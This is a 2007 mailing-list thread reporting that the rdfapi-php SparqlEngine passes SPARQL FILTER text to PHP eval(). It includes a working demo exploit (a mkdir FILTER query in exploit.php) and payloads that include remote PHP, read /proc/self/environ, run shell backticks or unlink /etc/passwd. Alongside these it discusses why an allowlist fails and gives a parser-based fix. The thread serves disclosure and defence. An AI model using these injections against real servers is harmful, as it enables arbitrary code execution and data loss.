From: Christian W. <cw...@cw...> - 2007-01-25 16:33:05
Hello,

http://sites.wiwiss.fu-berlin.de/suhl/bizer/rdfapi/tutorial/sparqlTestcases.htm states that the normal SparqlEngine passes nearly all test cases, regex ones included. When running the unit tests, the test script stops at "regex-query-001" and does nothing further. This is because SparqlEngine suppresses errors in eval() on line 706 by prefixing it with "@". When removing it, I get the following error:

---------------
Fatal error: Call to undefined function regex() in /data/Studium/Diplomarbeit/rdfapi-php/api/sparql/SparqlEngine.php(706) : eval()'d code on line 1
---------------

This one is very natural since (IMO) there is no regex handling code in the engine. How come the test case overview page states that it passes all those tests?

-- 
Regards/Mit freundlichen Grüßen
Christian Weiske
From: Chris B. <ch...@bi...> - 2007-01-25 17:06:13
> This one is very natural since (IMO) there is no regex handling code in
> the engine. How come the test case overview page states that
> it passes all those tests?

Maybe Tobias wanted a better mark for this master thesis ;-)

Chris

----- Original Message -----
From: "Christian Weiske" <cw...@cw...>
To: <rdf...@li...>
Sent: Thursday, January 25, 2007 5:32 PM
Subject: [Rdfapi-php-interest] SparqlEngine / regex passes?

_______________________________________________
Rdfapi-php-interest mailing list
Rdf...@li...
https://lists.sourceforge.net/lists/listinfo/rdfapi-php-interest
From: <tob...@we...> - 2007-01-25 18:49:48
Hi Christian.

The regex function is evaluated in rdfapi-php\api\sparql\FilterFunctions.php. It works fine for me. Did you change something with the import mechanism so that this file is not imported with the sparql package?

Regards
Tobias

>> This one is very natural since (IMO) there is no regex handling code in
>> the engine. How come the test case overview page states that
>> it passes all those tests?
>
> Maybe Tobias wanted a better mark for this master thesis ;-)
>
> Chris
From: Christian W. <cw...@cw...> - 2007-01-25 22:13:31
Tobias,

> The regex function is evaluated in
> rdfapi-php\api\sparql\FilterFunctions.php. It works fine for me. Did you
> change something with the import mechanism so that this file is not
> imported with the sparql package?

Yes, I did change my imports a bit. Now that I understand how you did this, I discovered that your eval'ing code lets someone fully exploit a server that lets you input your own SPARQL queries:

--------------
SELECT ?a WHERE { ?a ?b ?c . FILTER mkdir('/home/cweiske/exploit') }
--------------

You can put anything instead of mkdir, incl. unlink, SQL database access and everything.

Working demo exploit:

exploit.php:
---------------------
<?php
require_once(dirname(__FILE__) . '/../config.php');
require_once RDFAPI_INCLUDE_DIR . 'RdfAPI.php';
require_once RDFAPI_INCLUDE_DIR . 'sparql/SparqlParser.php';
require_once RDFAPI_INCLUDE_DIR . 'sparql/SparqlEngine.php';

$parser = new SparqlParser();
$graphset = ModelFactory::getDatasetMem('Dataset1');
$def = $graphset->getDefaultGraph();
$def->load(dirname(__FILE__) . '/exploit.n3');

$qs = "
SELECT ?a WHERE {
    ?a ?b ?c .
    FILTER mkdir('/home/cweiske/exploit')
}
";
$q = $parser->parse($qs);
$engine = SparqlEngine::factory();
$t = $engine->queryModel($graphset, $q, false);
?>
---------------------

exploit.n3:
---------------------
@prefix foaf: <http://xmlns.com/foaf/0.1/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .

_:alice rdf:type foaf:Person ; .
---------------------

-- 
Regards/Mit freundlichen Grüßen
Christian Weiske
From: <au...@in...> - 2007-01-25 23:13:01
Christian Weiske wrote:
> Working demo exploit:

Good job in detecting the security hole! But I guess it would be more constructive to post a patch to close the hole instead of an exploit ;-)

Sören
From: Christian W. <cw...@cw...> - 2007-01-25 23:24:26
Sören,

> Good job in detecting the security hole! But I guess it would be more
> constructive to post a patch to close the hole instead of an exploit ;-)

The current implementation makes it IMO not possible to close the hole fully. It works the following way:

sparql filter string -> some preg replaces -> eval

Since there is no state machine/parser in the background which only accepts valid code and drops invalid (all code is used, just some cases like str() or dateTime() are re-formatted), it is not possible to fix it. A totally new approach and code would be needed.

-- 
Regards/Mit freundlichen Grüßen
Christian Weiske
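The kind of replacement described above, as an added example (my own PHP 7.4+ code, not rdfapi-php's and not something posted in this thread): the FILTER string is tokenised and parsed by a small precedence-climbing parser and evaluated directly against a row of bindings, so eval() is never called and only the names dispatched in call() can run. The supported subset (?var, "string", regex(), str(), comparison, && || ! and parentheses), the class name and the sample bindings are my own choices; the demo feeds it the mkdir() query from this thread plus a few other code-shaped inputs.

```php
<?php
// Added example (PHP 7.4+), not code from rdfapi-php or from anyone in this thread. The FILTER string is
// tokenised and parsed; nothing is ever passed to eval(), and only the two names in call() can execute.
// The supported subset, the class and the sample row are my own choices.

final class FilterEvaluator
{
    // One token per match: ?var | "string" | operator | bare name. Anything else (', `, $, ;) is rejected.
    private const TOKEN = '/\G\s*(?:(\?[A-Za-z_]\w*)|("(?:[^"\\\\]|\\\\.)*")|(&&|\|\||!=|<=|>=|[=<>!(),])|([A-Za-z_]\w*))/';
    private const PREC  = ['||' => 1, '&&' => 2, '=' => 3, '!=' => 3, '<' => 3, '>' => 3, '<=' => 3, '>=' => 3];
    private array $bindings, $tok = [];
    private int $pos = 0;
    public function __construct(array $bindings) { $this->bindings = $bindings; }

    public function evaluate(string $filter): bool
    {
        [$this->tok, $this->pos] = [$this->tokenize($filter), 0];
        $v = self::truthy($this->parseExpr());
        if ($this->pos !== count($this->tok)) throw new InvalidArgumentException('trailing input in FILTER');
        return $v;
    }
    private function tokenize(string $s): array
    {
        for ($out = [], $off = 0, $len = strlen(rtrim($s)); $off < $len; $off += strlen($m[0])) {
            if (!preg_match(self::TOKEN, $s, $m, 0, $off)) throw new InvalidArgumentException("bad character at offset $off");
            foreach (['var', 'str', 'op', 'name'] as $i => $kind) if ($m[$i + 1] !== '') break;   // first non-empty group
            $out[] = [$kind, $kind === 'str' ? stripcslashes(substr($m[$i + 1], 1, -1)) : $m[$i + 1]];
        }
        return $out;
    }
    // Consume the operator token $op if it is next; with $required, its absence is a syntax error.
    private function op(string $op, bool $required = false): bool
    {
        $t = $this->tok[$this->pos] ?? null;
        if ($t !== null && $t[0] === 'op' && $t[1] === $op) { $this->pos++; return true; }
        if ($required) throw new InvalidArgumentException("expected '$op'");
        return false;
    }
    // Precedence climbing over PREC; "!" binds tighter than every binary operator.
    private function parseExpr(int $minPrec = 1)
    {
        $l = $this->op('!') ? !self::truthy($this->parseExpr(4)) : $this->parsePrimary();
        while (($t = $this->tok[$this->pos] ?? null) !== null && $t[0] === 'op' && (self::PREC[$t[1]] ?? 0) >= $minPrec) {
            $this->pos++;
            $l = self::apply($t[1], $l, $this->parseExpr(self::PREC[$t[1]] + 1));
        }
        return $l;
    }
    private function parsePrimary()
    {
        $t = $this->tok[$this->pos++] ?? null;
        if ($t === null)      throw new InvalidArgumentException('unexpected end of FILTER');
        if ($t[0] === 'var')  return $this->bindings[$t[1]] ?? null;   // unbound variable yields null
        if ($t[0] === 'name') return $this->call($t[1]);
        if ($t[0] === 'str')  return $t[1];
        if ($t[1] !== '(')    throw new InvalidArgumentException("unexpected '{$t[1]}'");
        $v = $this->parseExpr();
        $this->op(')', true);
        return $v;
    }
    private function call(string $name)
    {
        // Fixed dispatch by name: no eval(), no $name(...), so mkdir, unlink or require can never be reached.
        if (!in_array($name, ['regex', 'str'], true)) throw new InvalidArgumentException("unknown FILTER function '$name'");
        $this->op('(', true);
        $args = [];
        do { $args[] = $this->parseExpr(); } while ($this->op(','));
        $this->op(')', true);
        return $name === 'str' ? (string) $args[0] : self::regex($args);
    }
    private static function apply(string $op, $l, $r)
    {
        if ($op === '||') return self::truthy($l) || self::truthy($r);
        if ($op === '&&') return self::truthy($l) && self::truthy($r);
        if ($l === null || $r === null) return false;   // comparison with an unbound operand: error, row dropped
        $c = strcmp((string) $l, (string) $r);
        return ['=' => $c === 0, '!=' => $c !== 0, '<' => $c < 0, '>' => $c > 0, '<=' => $c <= 0, '>=' => $c >= 0][$op];
    }
    private static function regex(array $args): bool
    {
        $flags = (string) ($args[2] ?? '');
        if (count($args) < 2 || !preg_match('/^[imsx]*\z/', $flags)) throw new InvalidArgumentException('bad regex() call');
        // The pattern is data for PCRE and never reaches the PHP parser; an invalid pattern is simply a non-match.
        return @preg_match('~' . str_replace('~', '\~', (string) $args[1]) . '~' . $flags, (string) $args[0]) === 1;
    }
    private static function truthy($v): bool { return is_bool($v) ? $v : (is_string($v) && $v !== ''); }
}

// Demo: one bindings row, a legitimate filter, then the exploit from this thread and other code-shaped input.
function demo(): array
{
    $e = new FilterEvaluator(['?a' => 'http://example.org/alice', '?name' => 'Alice']);
    $ok = $e->evaluate('regex(?name, "^ali", "i") && (str(?a) != "" || !?missing)');
    $rejected = [];
    foreach (["mkdir('/home/cweiske/exploit')", 'require "http://some.where/x.php"', '`id`', '"mkdir"("/tmp/x")'] as $p) {
        try { $e->evaluate($p); }
        catch (InvalidArgumentException $x) { $rejected[$p] = $x->getMessage(); }
    }
    return ['legitimate_filter' => $ok, 'rejected' => $rejected];
}

print_r(demo());   // legitimate_filter => 1 and all four payloads listed under "rejected"
```

Run it with the php CLI. Any input that is not an expression of the subset raises InvalidArgumentException before anything is executed, and adding another FILTER function means adding a branch to call(), never widening what the tokenizer accepts.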
From: <au...@in...> - 2007-01-26 00:01:02
Christian Weiske wrote:
> The current implementation makes it IMO not possible to close the hole
> fully.

Why not extract all function calls from the string and compare them with an array of allowed functions, e.g.:

preg_match_all('/\s([A-Z0-9_]+)\(/i',$evalstr,$matches);

if(array_diff($matches[1],$allowedFuncs))
    // denied function call

I admit it is a bit quick and dirty (maybe ""-enclosed strings should also be extracted from $evalstr first), but it should work, as I understand the problem...

Sören
From: Christian W. <cw...@cw...> - 2007-01-26 05:17:46
Sören,

> Why not extract all function calls from the string and compare them with
> an array of allowed functions, e.g.:
>
> preg_match_all('/\s([A-Z0-9_]+)\(/i',$evalstr,$matches);
>
> if(array_diff($matches[1],$allowedFuncs))
>     // denied function call
>
> I admit it is a bit quick and dirty (maybe ""-enclosed strings should also be
> extracted from $evalstr first), but it should work, as I understand the
> problem...

Besides the q&d touch, it also doesn't protect you from using language constructs instead of functions. E.g. require_once is a language construct and can be called without braces:

> FILTER require "http://some.where/over/the/rainbow.php"

which, together with allow_url_fopen, just cannot be stopped. Now we might remove another set of hard-coded keywords like require and include from the string without context, but they also might be valid strings in a search -> FILTER ?code = "require_once".

Point is, there is no way to secure eval(); that's why everyone warns you against using it. It isn't even (except under very certain conditions) allowed in PEAR. And, eval is very similar to evil - now you know why :)

-- 
Regards/Mit freundlichen Grüßen
Christian Weiske
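The allowlist check from the previous message, run against the kinds of input this reply describes, as an added example (my own PHP, not from the thread or from rdfapi-php). The allowed-function list and the FILTER bodies are constructed for the demonstration; only the first body is caught, the rest reach eval() untouched even though none of them calls an allowed function.

```php
<?php
// Added example, not code from the thread or from rdfapi-php: the allowlist check proposed
// above, run against FILTER bodies of the kind discussed in the reply. All strings are constructed.

function allowlistPasses(string $evalstr, array $allowedFuncs): bool
{
    preg_match_all('/\s([A-Z0-9_]+)\(/i', $evalstr, $matches);   // the proposed check, verbatim
    return array_diff($matches[1], $allowedFuncs) === [];
}

// FILTER bodies as the engine would hand them to eval(), each with the verdict the allowlist gives.
function allowlistVerdicts(): array
{
    $allowed = ['regex', 'str', 'bound', 'lang', 'datatype'];
    $bodies = [
        ' mkdir("/home/cweiske/exploit")',                   // plain call: "mkdir(" is matched and denied
        ' require "http://some.where/over/the/rainbow.php"', // language construct: no "(" at all
        ' include "/proc/self/environ"',                     // same, reading a local file
        ' `id`',                                             // backtick operator: shell_exec() without a name
        ' "mkdir"("/tmp/pwned")',                            // string callable: "(" follows a quote, not a name
        ' $f = "unlink"; $f("/etc/passwd")',                 // variable function: "(" follows $f, not a name
        ' ?code = "require_once"',                           // legitimate search string a keyword blocklist would hit
    ];
    $out = [];
    foreach ($bodies as $b) $out[trim($b)] = allowlistPasses($b, $allowed) ? 'passes' : 'denied';
    return $out;
}

print_r(allowlistVerdicts());   // only mkdir("/home/cweiske/exploit") is denied; the other six pass
```

The regex only sees a name directly followed by "(", so every form of calling code that PHP offers without that shape goes through, and the last body shows why a keyword blocklist is not a fix either: it would reject a harmless comparison with a literal.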
From: Christian W. <cw...@cw...> - 2007-01-26 05:54:26
> Point is, there is no way to secure eval(); that's why everyone warns
> you against using it. It isn't even (except under very certain conditions)
> allowed in PEAR. And, eval is very similar to evil - now you know why :)

I think a security advisory should be posted on the homepage with the "solution" to not allow arbitrary code or to disable SPARQL at all.

-- 
Regards/Mit freundlichen Grüßen
Christian Weiske